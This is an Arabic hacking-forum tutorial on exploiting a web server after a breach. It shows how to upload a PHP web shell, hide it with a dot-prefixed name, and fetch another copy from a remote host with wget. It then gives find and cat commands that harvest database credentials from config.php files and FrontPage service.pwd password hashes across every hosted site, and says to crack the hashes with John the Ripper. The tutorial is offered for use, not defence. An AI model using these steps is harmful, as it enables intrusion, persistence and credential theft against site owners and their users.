اخواني موضوعي اليوم هو شرح و تطبيق و احتراف استخدام السكربت phpshell قد يكون قديم نوع ما و لكن هناك الكثير للاسف يجهله و انا اتمنى بعد هذا الشرح ان اقوم بسد ثغرات كثيرة لدى الجميع و يكتسبوا معلومات عن هذا السكربت.
البي اتش بي شل (phpshell) هو سكربت بلغة الـphp
وعند رفع هذا السكربت على اي سيرفر تستطيع تطبيق اوامر الينكس
ومن الأوامر تستطيع معرفت جميع المواقع على السيرفر وقراءة ملف الـconfig
للمواقع الموجوده على السيرفر يعني انت اذا اخترقت موقع عن طريق اي ثغره
تحمل على الموقع هذا السكربت وتجعله في ملف مخفي على السيرفر وتروح لمسار
السكربت يعني لو كان الموقع www.israel.org وانت حملت السكربت على ملف mail
وكان اسم السكربت phpshell.php بيكون بطريقه هذي
www.israel.org/mail/phpshell.php
وطبقت الأوامر عليه راااااح تملك كامل السيرفر بس اذا ما كاا مفعل السيف مود(safe mode)
رااااااح تكتشف هذي الأسرااااااار اذا طبقت الأوامر.....
cat /home/*/public_html/_vti_pvt/service.pwd
cat /home/*/public_html/_vti_pvt/access.cnf
cat /home/*/public_html/vb/admin/config.php
cat /home/*/public_html/phpbb/config.php
cat /home/*/public_html/forum/config.php
/usr/home/*/www/vb/admin/config.php
------------------
الي ابي اوضحه انه مو دائما تنفع هذي الاوامر راح تقولون لي ليش ؟؟ بقلكم لانه كل سيرفر وله تقسيمه الخاص فيه
طيب بشرح لكم كيف تسحب الملفات اذا ماوجدتوها بالاوامر الي حطها الاخ ياهوووو ...
بس قبل ماشرح ابي اوضح نقطة مهمة جدا
الي هي كيف تخفي سكربت الـ PHP SHELL عن النظر من الموقع عشان لا يشك صاحب الموقع ويحذفه لك ...
اوكي نبدأ الحين :
أول شيء تسويه تسحب من موقعك شيل من الشيل الي انت فيه بالطريقة هذي www.xxxx.com/11.php wget
الحين لازم أغير اسم الشيل عشان أخفيه بالطريقة هذي Mv 11.php .11.php
ملاحظين وش أضفنا اضفنا نقطة عشان يصير مخفي ولو حذف الاول الي محمله يكون معاك واحد مخفي ...
طيب الحين نرجع لموضوعنا الأول ( كيف نسحب : قواعد البيانات - المواقع - الباسوردات )
أولا نبدأ بالاسهل قواعد البيانات وتكون الباسوردات ماهي مشفرة : ونكتب هذا الأمر :
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
طيب نبي نقرأ المكتوب بداخل الملف نكتب هذا الأمر :
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
راح يطلع لك ملف الكونفيج وفيه مكتوب اليوسر نيم والباسورد تبع قاعدة البيانات
طبعا الكل يعرف الـ phpBB انه قاعدة بيانات للمنتدى ... طيب الحين عندك اليوسر والباس جاهز على طول راح تشبك ببرنامج
MySQL-Front_2.5_Setup وعاد بعدين انت وراسك ...
طيب الحين نبي نطلع باسوردات الموقع وهي اكيد راح تكون مشفرة
طبعا الكل يعرف ثغرة الفرونت بيج vti_pvt/service.pwd الحين راح نكتب الامر نستدعي كل ملفات الباسورد الي على السيرفر :
find / -name service.pwd
وراح يطلع لك بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
اوكي الحين مثلا ابي استعرض باسورد هذا الموقع :
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح اكتب هذا الامر :
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح يجيك الباسورد مشفر طبعا راح تفكه ببرنامج JHON THE RIPPER
(*_*) منقوووول مع الملك المدمر (*_*)
إن شاء الله أكون وفقت في الشرح ... والجميع يكون استوعب الدرس البسيط
mido_hack_2003@hotmail.com